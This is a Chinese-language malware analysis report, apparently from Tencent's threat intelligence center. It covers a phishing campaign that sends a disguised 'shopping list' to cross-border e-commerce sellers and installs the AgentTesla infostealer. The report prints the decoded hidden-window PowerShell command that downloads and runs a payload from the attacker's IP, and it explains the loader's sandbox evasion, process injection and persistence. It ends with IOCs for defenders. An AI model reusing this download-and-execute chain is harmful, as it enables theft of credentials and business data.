攻击者通过购物聊天工具投递“购物清单”,中招商户信息被窃

2019-01-22 09:48:10
腾讯御见威胁情报中心监测发现,一起针对外贸电商卖家的的定向钓鱼攻击事件:攻击者冒充境外买家采购商品,在电商沟通平台上发送伪装为“购物清单”的木马文件,欺骗受害外贸电商工作人员运行。

一、前言

近日,腾讯御见威胁情报中心接到网友小Y(化名)用户求助,称她在处理购物清单时突然被电脑管家拦截,小Y说这是一位阿根廷客户的订货单,比较重要的客户,希望电脑管家去除误报。电脑管家安全工程师与小Y合作取证,最终发现这不是误报,而是一起针对外贸电商卖家的的定向钓鱼攻击事件:攻击者冒充境外买家采购商品,在电商沟通平台上发送伪装为“购物清单”的木马文件,欺骗受害外贸电商工作人员运行。

一旦中招,该“购物清单”释放的攻击程序会从黑客控制的服务器下载伪装成Firefox浏览器的AgentTesla商业木马,该木马可以窃取键盘记录、截图、剪切板信息、摄像头捕捉的信息、用户通过浏览器输入的帐号密码等等关键资料将被收集发送到攻击者指定的邮箱。

御见威胁情报中心提醒外贸电商卖家,攻击者假冒国外客户发送精准钓鱼攻击,这只是本次攻击的信息收集阶段。当攻击者获取足够多的卖家信息时,可能会继续假冒国外客户进行更多诈骗活动:比如可能假冒国外合作方,骗取转帐、货款等等。

二、详细分析

木马伪装成购物清单藏在压缩包中,并且文件名带有迷惑性。

内置的两个文件都不是所谓的“购物清单”,而是用图片伪装的攻击程序。攻击者刻意把lnk的图标更改为jpg图标,而实际却指向一段下载者代码。


解压出来后看上去更像图片


其中x.jpg.lnk快捷方式指向mshta.exe,启动后会执行远程文件hxxp://141.136.44.78/Payload.hta,为避免引起怀疑,Payload.hta中首先会下载一张杜撰的购物清单图片并展示给卖家


接着会解密一段powsershell代码


Base64解密后:powershell.exe -ExecutionPolicy bypass -noprofile -WindowStyle Hidden (New-Object System.Net.WebClient).DownloadFile('hxxp://141.136.44.78/1.exe','%TEMP%\Hmmmm.exe');Start-Process %TEMP%\Hmmmm.exe;

Hmmmm.exe属于一个自解压的EXE文件,解压后会释放木马loader组件,mni.exe属于AutoIt脚本解释器,启动mni.exe并传入au3源码文件juk=kbl


mni.exe启动后首先检测运行环境,如果在虚拟环境中则不会有后续操作


读取sxa.mp3,该文件是loader的配置文件,其中在[Data]节包含一个加密的PE文件


加密算法使用AES,原始密匙在K3ys项指定:“opc


调用CSP服务解密PE文件


解密后的PE大小为0x71000命名为firefox.exe,随后判断系统中是否存在RegSvcs.exe文件,有则启动之,否则把系统默认的浏览器替换为木马的firefox.exe


RegSvcs.exe启动后,firefox.exe被注入到RegSvcs 进程中,随后Hmmmm.exe执行自删除并设置mni.exe为启动项


firefox.exe属于AgentTesla商业木马模块,采用C#编写,售价在$15--$69一年


该木马可窃取用户键盘记录、浏览器信息等功能,最新版于201810月更新到3.2.9.0AgentTesla木马可用生成器生成,可选定邮箱或FTP等多种方式上报信息本次捕获的使用邮箱上报


AgentTesla内置的字符串大部分被加密了,算法为Base64+AES


批量还原后可以看到AgentTeslaCC邮箱发送键盘记录信息


结束杀软进程


AgentTesla模块包含两个PE文件


14CDC.dll原名为IELibrary.dll,封装了操作浏览器信息的功能,如遍历及修改网站密码、添加删除收藏夹&历史记录、添加删除cookie等, 18FB4.exe负责偷取火狐浏览器的用户信息


AgentTesla不是一个实时的远控工具,而是一个信息窃密工具,包括键盘记录,截屏,剪贴板记录,以及摄像头图像


同时,工具还可以从电脑上提取还原多种登录信息缓存。


通过这些功能,木马很轻易的可以拿到电商卖家的管理密码,绑定的银行账户信息,聊天信息,客户资料,销售详情等信息,而这些都是电商平台的绝密信息,一旦外泄,将对企业造成难以估量的损失。

攻击者还会借助已收集到的信息继续对该电商卖家实施诈骗,比如欺骗转帐、汇款等等。

三、安全建议

         年关将至,堤防不乏分子的花式诈骗,不要让一年的努力付诸东流,同时提醒诸多电商卖家切勿随意点开“购物清单”,注意甄别清单文件后缀, 腾讯电脑管家将持续跟踪此次事件。

IOCs

IP

141.136.44.78

199.192.22.138


MD5

849d5e4645e61d26ecc9a77e58681f20

1871efde64064f549fa75470b9b5e199

1ca865bf37aec8222c14c18ff15386dd

77bf7927ed985d0f53ac1dc59c5bfd1c

0bebcf50fedf2c9ff31d5efc4c35aa78

849d5e4645e61d26ecc9a77e58681f20

1871efde64064f549fa75470b9b5e199

1ca865bf37aec8222c14c18ff15386dd

77bf7927ed985d0f53ac1dc59c5bfd1c

0bebcf50fedf2c9ff31d5efc4c35aa78

参考资料

当心特斯拉特工!使用AgentTesla窃取隐私信息案例分析

https://www.freebuf.com/column/149525.html

最新资讯